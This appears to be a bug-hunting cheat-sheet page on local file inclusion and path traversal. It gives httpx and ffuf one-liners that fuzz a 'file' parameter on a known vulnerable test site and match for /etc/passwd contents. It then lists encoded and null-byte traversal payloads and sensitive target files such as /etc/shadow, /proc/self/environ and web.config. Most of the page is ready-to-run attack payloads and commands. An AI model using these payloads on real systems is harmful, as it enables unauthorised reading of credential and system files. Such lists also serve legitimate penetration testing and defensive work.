Find LFI and Path Traversal

# LFI Testing on gf lfi Parameters)

# "Running LFI Testing on gf lfi Parameters with httpx..."
echo  "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"

# "Running LFI Testing on gf lfi Parameters with Fuff..."
echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done

Find LFI and Path Traversal

../\../\../\../\../\etc/passwd
..\/..\/..\/..\/..\/etc/passwd
/../../../../..etc/passwd
\/..\/..\/..\/..\/..etc/passwd

/..%2fREADME
/etc/passwd
//etc//passwd
/etc/passwd%00
L2V0Yy9wYXNzd2Q=
../../../etc/passwd%00.png
../../../../../etc/passwd
....//....//....//etc/passwd 
/var/www/images/../../../etc/passwd 
/****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
//..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts

Local files for Linux :

/etc/passwd
/etc/shadow
/etc/shells
/etc/group
/etc/profile
/etc/hosts
/proc/self/environ
/proc/self/status
/proc/mounts
/proc/version
/bin/sh

Local files for Windows :

web.config
windows/System32/drivers/etc/hosts

//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts

PreviousPage NextMy Hunting Approach on File Upload

Last updated 11 months ago